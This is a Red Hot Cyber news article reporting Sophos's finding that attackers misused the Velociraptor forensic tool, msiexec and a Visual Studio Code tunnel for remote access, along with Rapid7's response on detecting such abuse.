Red Hot Cyber
Cybersecurity, Cybercrime News and Vulnerability Analysis
Sophos security specialists have drawn attention to a cyberattack in which unknown attackers used the open-source forensic tool Velociraptor to monitor endpoints.
“In this incident, attackers used a tool to download and run Visual Studio Code with the likely intent of creating a tunnel to a command-and-control server,” Sophos Counter Threat experts said. Unit.
The report emphasizes that attackers often employ “living-off-the-land” (LotL) tactics and use legitimate remote monitoring and control tools in attacks, but the use of Velociraptor signals an evolution of such tactics, where incident response software is being misused for malicious purposes.
Analysis of the incident showed that the attackers used the Windows msiexec utility to download an MSI installer from the Cloudflare Workers domain, which also serves as a staging area for other solutions used by attackers, including the Cloudflare tunneling tool and the Cloudflare Remote Administration Utility. Radmin.
The MSI file was designed to deploy Velociraptor, which would then communicate with another Cloudflare Workers domain. The access was then used to download Visual Studio Code from the same staging server using an encoded PowerShell command and run it with the tunneling option enabled to allow both remote access and remote code execution.
Additionally, the attackers were observed reusing the Windows msiexec utility to download additional payloads. “Organizations should monitor and investigate unauthorized use of Velociraptor and consider the use of such tactics as a precursor to ransomware distribution,” Sophos warns.
Following Sophos’s publication of this report, security firm Rapid7, which develops Velociraptor, published a white paper that details how organizations can detect Velociraptor misuse in their environments.
“Rapid7 is aware of reports of abuse of the open-source incident response tool Velociraptor. Velociraptor is widely used by defenders for legitimate digital forensics and incident response purposes. But like many other security and administrative tools, it can be used for malicious purposes if it falls into the wrong hands,” the developers comment.
Follow us on Google News to receive daily updates on cybersecurity. Contact us if you would like to report news, insights or content for publication.
